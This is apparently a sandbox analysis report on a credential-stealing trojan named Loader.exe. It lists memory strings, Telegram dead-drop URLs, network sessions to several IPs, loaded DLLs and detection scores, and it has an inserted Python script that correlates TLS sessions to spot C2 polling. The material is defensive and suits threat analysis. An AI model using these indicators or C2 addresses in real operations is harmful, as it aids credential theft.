                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000002.00000003.1435554648.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Loader.exe, 00000002.00000003.1435499544.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
                Source: Loader.exe, 00000002.00000002.2665667377.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfqvd
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=aba847841a9f2f61b5_131170306833
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666330247.000000000351A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
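The network evidence above lists every session twice: once as a raw flow on port 443 ("HTTP traffic on port 49720 -> 443", logged in both directions) and once as the TLS handshake the sandbox decoded ("HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720"). The client's ephemeral port is the join key between the two views. The following is an added example, not part of the Joe Sandbox report: it parses the lines copied from above, joins the flow view and the handshake view by client port, counts sessions per server and reports ports that appear in one view but not the other. The helper names and the output structure are my own.

```python
"""Join the two views of the network evidence in a Joe Sandbox report.

Added example, not part of the report: the evidence lines are copied from the
report above; the helper names and the output structure are my own.
"""
import re
from collections import Counter

# Detail column of the network evidence lines above (copied from the report).
EVIDENCE = """\
Network traffic detected: HTTP traffic on port 49720 -> 443
Network traffic detected: HTTP traffic on port 443 -> 49708
Network traffic detected: HTTP traffic on port 443 -> 49719
Network traffic detected: HTTP traffic on port 443 -> 49707
Network traffic detected: HTTP traffic on port 443 -> 49718
Network traffic detected: HTTP traffic on port 443 -> 49706
Network traffic detected: HTTP traffic on port 49713 -> 443
Network traffic detected: HTTP traffic on port 443 -> 49705
Network traffic detected: HTTP traffic on port 49715 -> 443
Network traffic detected: HTTP traffic on port 443 -> 49704
Network traffic detected: HTTP traffic on port 443 -> 49715
Network traffic detected: HTTP traffic on port 49718 -> 443
Network traffic detected: HTTP traffic on port 443 -> 49713
HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49706 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49707 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49708 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49711 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49713 version: TLS 1.2
HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49715 version: TLS 1.2
HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49719 version: TLS 1.2
HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
"""

HTTP_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (?P<server>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<client>[\d.]+):(?P<cport>\d+) version: (?P<ver>TLS [\d.]+)"
)


def parse_tls_sessions(text):
    """Map client ephemeral port -> (server ip, server port, TLS version) from the decoded handshakes."""
    sessions = {}
    for line in text.splitlines():
        m = TLS_RE.search(line)
        if m:
            sessions[int(m["cport"])] = (m["server"], int(m["sport"]), m["ver"])
    return sessions


def parse_flow_ports(text):
    """Client ports seen in the raw flow lines. The sandbox logs both directions of
    each flow, so the client port is whichever side is not 443."""
    ports = set()
    for line in text.splitlines():
        m = HTTP_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            ports.add(b if a == 443 else a)
    return ports


def sessions_per_server(sessions):
    """TLS sessions per server IP; repeated sessions to one host is the C2 polling pattern."""
    return Counter(server for server, _, _ in sessions.values())


def unmatched_ports(text):
    """(flow-only ports, handshake-only ports): evidence present in one view but not the other."""
    sessions = parse_tls_sessions(text)
    flows = parse_flow_ports(text)
    return sorted(flows - set(sessions)), sorted(set(sessions) - flows)


if __name__ == "__main__":
    current = parse_tls_sessions(EVIDENCE)
    for server, n in sessions_per_server(current).most_common():
        print(f"{server}: {n} TLS session(s)")
    print("flow-only ports, handshake-only ports:", unmatched_ports(EVIDENCE))
```

On these lines 104.21.77.86 receives six of the nine decoded sessions, which is the polling pattern of a C2 channel rather than a one-off download. Two client ports (49705, 49718) have flow evidence without a decoded handshake and 49711 has the reverse, so both lists have to be read before quoting a session count. 149.154.167.99 sits in a Telegram netblock and 104.21.77.86 and 188.114.96.3 are Cloudflare edge addresses, so the bare IPs are weak indicators; the TLS server name and the JA3 fingerprint the report flags elsewhere are the better pivot.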
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00061410
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00042D00
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00026D70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00061E40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00021000
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007B800
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00096000
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002B810
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00031810
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004D810
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00048820
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002E02C
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00064830
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00072830
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00036840
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002A050
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004A050
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007F870
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007C870
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0009009A
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00066890
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00081090
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000360C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006F8C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007A0C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000760E7
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000568E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004B0F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000500F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00044100
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00085910
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00048120
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006D920
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002D930
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004C930
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005A930
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00029960
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00053160
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00073160
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004D970
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007C170
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00035980
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00077980
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000401A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005E1B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004A9D0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000649E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000339F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002B200
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00031A00
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00053A00
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005D200
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005B200
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007BA20
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007CA30
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00086230
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006EA40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00046260
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00051A70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005EA70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00076A70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007F270
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005BA80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00072A80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004BA90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00059290
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00062AA0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000322B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000762B3
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00074AB0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007A2B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000802B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000562C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002AAD6
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000532D0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006BAD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003F2E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00035B20
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003FB20
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00044B60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004A360
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00077360
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000A3362
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00033370
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00032B90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000253B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000343B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000453B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00052BB0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00060BD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000373F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00038BF0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00025406
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00058C10
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00049420
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00072420
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00070430
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00041440
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00073450
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00028C55
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00056C80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002A490
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007E490
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00087C90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007DCB0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00033CC0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005F4C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000A14E8
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00031CF0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000814F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004A500
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005C500
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00064D10
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006C510
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007B510
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003FD30
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00031540
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00044D40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00048540
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00075540
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00034D60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007BD60
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00051570
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005AD70
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00074D80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00086580
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00063D90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002FDB0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00056DB0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007D5B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000805B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004E5C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00073DC0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003F5D0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000395D0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00075DD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002E5E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004ADE0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000565F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0006D5F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00044600
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00082E30
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00088630
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002B650
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00054E50
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00088E50
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00041660
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002D670
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005A670
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00034680
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004BE80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00049E90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00053E90
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00065690
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000296A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000646A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000406B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000596B0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003A6C0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0008B6D2
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00074710
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00078720
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007EF40
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00076748
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0003C750
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00053750
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002CF5B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0007CF80
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0004E7A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000627A0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00048FC0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00055FC0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00076FD0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0002E7E0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0005B7F0
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00D6F51C
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00D6F50D
Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 0008BBE0 appears 49 times
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Loader.exe | Static PE information: Section: .bss ZLIB complexity 1.0003222795163584
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/0@13/4
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\Desktop\Loader.exe | Command line argument: y 0_2_00097940
Source: Loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Loader.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Loader.exe, 00000002.00000003.1518122386.0000000003494000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1488455652.00000000034CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1488988393.0000000003486000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Loader.exe | Virustotal: Detection: 32%
Source: Loader.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\Loader.exe | File read: C:\Users\user\Desktop\Loader.exe
Source: unknown | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0008BD9A push ecx; ret 0_2_0008BDAD
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB6DA pushad ; retf 2_3_00DEB6F9
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB4ED push ds; retf 2_3_00DEB509
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEA9ED pushfd ; ret 2_3_00DEAA03
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DE9BE1 push ebp; ret 2_3_00DE9C43
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB5BD push es; retf 2_3_00DEB5C9
